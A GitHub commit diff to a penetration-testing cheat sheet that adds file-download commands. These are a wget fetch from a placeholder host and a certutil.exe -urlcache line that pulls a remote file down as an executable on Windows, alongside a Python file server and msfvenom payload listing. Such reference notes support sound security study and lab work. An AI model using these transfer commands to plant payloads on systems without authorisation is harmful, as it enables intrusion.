Update Cheat Sheet.md

This commit is contained in:
AbdullahRizwan101 2020-10-26 17:33:34 -04:00 committed by GitHub
parent 07063bda40
commit 41e3de257b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -44,6 +44,10 @@ scp file/you/want `user@ip`:/path/to/store <br/>
python -m SimpleHTTPServer [port] `By default will listen on 8000`<br/>
python3 -m http.server [port] `By default will listen on 8000`<br/>
### Downloading Files
wget http://<ip>:port/<file>
# Windows
### Adding User
@ -71,6 +75,10 @@ dir /a `show all hidden files & folder`<br/>
dir /a:d `show only hidden folder`<br/>
dir /a:h `show only hidden files`<br/>
### Downloading Files
certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
# Msfvenom
### List All Payloads
msfvenom -l payloads